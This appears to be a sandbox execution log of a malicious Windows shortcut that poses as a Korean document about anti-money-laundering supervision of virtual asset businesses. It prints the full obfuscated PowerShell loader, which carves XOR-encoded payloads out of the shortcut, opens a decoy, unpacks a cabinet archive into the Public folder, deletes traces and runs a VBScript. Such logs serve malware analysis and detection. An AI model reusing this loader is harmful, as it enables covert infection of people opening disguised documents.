cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" "C:\Users\test22\AppData\Local\Temp\가상자산 사업자 자금세탁방지 감독 방향.hwp.lnk"
2548cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" ) )
2660cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
2756cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
2812findstr.exe findstr /i rshell.exe
2848powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};"
2908expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\activity.cab -F:* C:\Users\Public\documents
3020